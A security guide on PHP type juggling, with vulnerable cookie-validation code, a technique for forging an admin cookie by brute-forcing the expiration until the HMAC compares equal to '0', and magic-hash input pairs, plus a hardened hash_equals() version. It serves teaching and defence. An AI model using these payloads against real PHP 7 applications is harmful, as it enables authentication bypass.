PHP type juggling payload guide
PHP provides two ways to compare two variables: loose comparison (== or !=) and strict comparison (=== or !==). PHP type juggling vulnerabilities arise when loose comparison is employed instead of strict comparison in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs.

PHP 8 won't try to cast strings into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collisions with hashes starting with 0e and the like are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like sha1([]) and md5([]) silently returning NULL (in PHP 8 they throw a TypeError instead).

True statements (PHP 7 and earlier):

```php
'123' == 123
'123a' == 123
'abc' == 0
'' == 0 == false == NULL
'' == 0       # true
0 == false    # true
false == NULL # true
NULL == ''    # true
```

NULL statements (PHP 7 and earlier):

```php
var_dump(sha1([])); # NULL
var_dump(md5([]));  # NULL
```

Example vulnerable code:

```php
function validate_cookie($cookie, $key) {
    $hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['expiration'], $key);
    if ($cookie['hmac'] != $hash) { // loose comparison
        return false;
    }
    ...
```

If we can make the calculated hash string Zero-like and provide "0" in the cookie's hmac field, the loose comparison "0e768261251903820937390661668547" == "0" evaluates to true. We have control over 3 elements in the cookie: username, expiration and hmac. Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC.

```
hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49"
hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4"
hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b"
hash_hmac(admin|1424869666) -> "105c0abe89825a14c471d4f0c1cc20ab"
...
hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e174892301580325162390102935332" == "0"
```

Magic Hashes - Exploit

If the computed hash starts with "0e" (or "0..0e") followed only by digits, PHP will treat the hash as a float.
```php
<?php
# Each pair hashes to a "0e..." string; with loose comparison both sides become
# the float 0 (PHP 7 and earlier), so the comparison is true.
var_dump(md5('240610708') == md5('QNKCDZO'));   # bool(true)
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));   # bool(true)
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY')); # bool(true)
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); # bool(true)
?>
```
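As an added example (not code from the original page), here is the validate_cookie() pattern from above beside a hardened version that defeats the Zero-like HMAC trick and the magic-hash comparisons; the key, usernames and cookie values are constructed for the demonstration:

```php
<?php
// Added example, not code from the original page: the page's validate_cookie()
// pattern beside a hardened version. The key, usernames and cookie values are
// constructed for this demonstration.

// Vulnerable pattern (as on the page): != is a loose comparison, so on PHP 7 a
// computed HMAC that looks numeric, e.g. "0e1748...", compares equal to a
// supplied hmac of "0".
function validate_cookie_loose(array $cookie, string $key): bool {
    $hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['expiration'], $key);
    if ($cookie['hmac'] != $hash) {
        return false;
    }
    return true;
}

// Hardened: every field must be present and a string, the separator cannot be
// injected through the username, and the MAC is checked with hash_equals(), a
// byte-for-byte constant-time comparison that never juggles types.
// (=== also stops the juggling but still leaks timing information.)
function validate_cookie_strict(array $cookie, string $key): bool {
    foreach (['username', 'expiration', 'hmac'] as $field) {
        if (!isset($cookie[$field]) || !is_string($cookie[$field])) {
            return false;
        }
    }
    if (strpos($cookie['username'], '|') !== false) {
        return false;
    }
    $expected = hash_hmac('sha256', $cookie['username'] . '|' . $cookie['expiration'], $key);
    return hash_equals($expected, $cookie['hmac']);
}

$key = 'constructed-server-secret';

// A cookie the server itself issued: accepted by the hardened check.
$issued = ['username' => 'alice', 'expiration' => '1424869663'];
$issued['hmac'] = hash_hmac('sha256', $issued['username'] . '|' . $issued['expiration'], $key);
var_dump(validate_cookie_strict($issued, $key));

// A forged cookie carrying the "0" hmac from the page: rejected by hash_equals()
// regardless of what the computed MAC looks like.
$forged = ['username' => 'admin', 'expiration' => '1835970773', 'hmac' => '0'];
var_dump(validate_cookie_strict($forged, $key));

// The comparison the loose version relies on, isolated, using the page's
// Zero-like hash: loose == versus hash_equals().
var_dump('0e174892301580325162390102935332' == '0');
var_dump(hash_equals('0e174892301580325162390102935332', '0'));
```

Under PHP 7 the loose comparison on the second-to-last line is true while hash_equals() is false; under PHP 8 both are false, matching the page's note that the Saner string to number comparisons RFC ended these collisions.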